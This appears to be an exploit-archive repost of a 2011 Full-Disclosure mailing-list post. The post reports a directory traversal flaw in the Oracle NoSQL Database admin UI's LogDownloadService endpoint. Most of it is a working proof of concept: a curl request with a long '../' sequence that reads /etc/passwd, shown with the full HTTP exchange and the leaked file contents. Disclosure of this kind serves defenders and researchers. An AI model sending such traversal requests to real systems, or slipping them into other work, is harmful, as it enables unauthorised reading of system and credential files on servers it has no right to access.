Oracle NoSQL Directory Traversal



EKU-ID: 1275 CVE: OSVDB-ID:
Author: Charter Published: 2011-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Hi List,

I don't know if this worth anything, because the manual says:

"Oracle NoSQL Database is intended to be installed in a secure
location where physical and network access to the store is restricted
to trusted users. For this reason, at this time Oracle NoSQL
Database's security model is designed to prevent accidental access to
the data. It is not designed to prevent malicious access or
denial-of-service attacks."

Anyway, here is the deal:

+++

$ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd

* About to connect() to 127.0.0.1 port 5001 (#0)
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)
> GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
> User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
> Host: 127.0.0.1:5001
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Content-Length: 1668
< Content-Disposition: attachment;
filename="../../../../../../../../../../../../../../../etc/passwd"
< Server: Jetty(7.4.0.v20110414)
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
[...]

+++

Software: Oracle NoSQL Database 11gR2.1.1.100

Regards,

Buherator

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/